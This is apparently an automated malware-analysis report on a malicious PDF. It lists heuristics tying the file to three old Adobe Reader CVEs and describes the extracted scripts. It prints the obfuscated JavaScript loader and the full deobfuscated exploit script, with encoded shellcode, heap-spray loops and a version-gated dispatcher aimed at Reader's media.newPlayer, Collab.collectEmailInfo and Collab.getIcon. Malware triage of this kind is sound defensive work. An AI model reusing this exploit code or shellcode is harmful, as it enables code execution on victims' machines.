MALICIOUS
Risk Score: 476
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, specifically 'javascript_obj0039_000.js', appears to be obfuscated and is likely responsible for downloading and executing a secondary payload. The 'legacy_pdfkit_stage_000.js' is a deobfuscated version of the script. The presence of String.fromCharCode further suggests obfuscation techniques common in malicious scripts.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
- media.newPlayer — CVE-2009-4324 (critical, CVE exact, CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
- Collab.getIcon — CVE-2009-0927 (critical, CVE exact, CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE exact, CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher (critical, CVE likely, PDF_PIDIEF_MULTI_CVE_DISPATCH): A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- Multi-CVE Adobe Reader JavaScript exploit kit (critical, PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action (low, 2 related findings, PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical, PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: i6M5222S="C4HmQ5j=[ …
- Embedded JS stream (low, PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0039_000.js | pdf-javascript-stream | PDF /JS object 39 at offset 0x16F | 20420 bytes |

SHA-256: 3b3ae952aef55af3da3e023d001f3e76f49a9ac394a7b4f19ca5dab89331a44e
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):
i6M5222S="C4HmQ5j=[ … ]";
Fy0edSWX2=app["e"+"v"+""+""+"al"];Fy0edSWX2(i6M5222S);
z77VLJi=C4HmQ5j;W0kE1s787x=''; Ec9oMvx=this.numPages; Y5tMaZ2=52;
for (HcVjBV4apa=0;HcVjBV4apa<z77VLJi.length;HcVjBV4apa++){z77VLJi[HcVjBV4apa] ^=Ec9oMvx; z77VLJi[HcVjBV4apa] ^=Y5tMaZ2; W0kE1s787x +=String.fromCharCode(z77VLJi[HcVjBV4apa]);}Fy0edSWX2(W0kE1s787x);

| Filename | Kind | Source | Size |
|---|---|---|---|
| legacy_pdfkit_stage_000.js | deobfuscated-js | numeric array XOR decoded JavaScript at offset 0x16F | 5326 bytes |

SHA-256: db5c1d3958e2b4bba5744133d69607db6a5ba2fb737c60c90a50a046de2b5d8f

Preview script (first 1,000 lines of the extracted script):

| Filename | Kind | Source | Size |
|---|---|---|---|
| legacy_pdfkit_stage_001.js | deobfuscated-js | numPages XOR decoded JavaScript at offset 0x16F | 5326 bytes |

SHA-256: 7b037fa54190e770de0dcf95257be25307cfa7f02f349897a3cc5594440f0b09
Detection: ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely. Carved artifact contains 9 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function newplayer(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%u96D5%u91DF%uD7DE%u8994%uCFCD%uC5DF%uD5D7%u8896%uCED6%u99D6%uD6D5%u9BCA%uC2D6%uF9C0%uC3C8%uF6D1%uC7CA%uC3DF%u80D4%uCEC0%uA69B");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}
function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%u96D5%u91DF%uD7DE%u8994%uCFCD%uC5DF%uD5D7%u8896%uCED6%u99D6%uD6D5%u9BCA%uC2D6%uF9C0%uCBC3%uCFC7%u80CA%uCEC0%uA69B");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%u96D5%u91DF%uD7DE%u8994%uCFCD%uC5DF%uD5D7%u8896%uCED6%u99D6%uD6D5%u9BCA%uC2D6%uF9C0%uC3C1%uCFD2%uC9C5%u80C8%uCEC0%uA69B");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;}
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
function pdf_check_vers(){
var version=app.viewerVersion.toString();
version=version.replace(/\D/g,'');
var ver_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));
if((ver_array[0]<8)||(ver_array[0]==8&&ver_array[1]<2&&ver_array[2]<2)) {
collab_email();
}
if((ver_array[0]==8&&ver_array[1]<1&&ver_array[2]<3)||(ver_array[0]==9&&ver_array[1]<1)){
collab_geticon();
}
if((ver_array[0]==8&&ver_array[1]<2)||(ver_array[0]==9&&ver_array[1]<3)){
newplayer();
}
else{}
}
pdf_check_vers();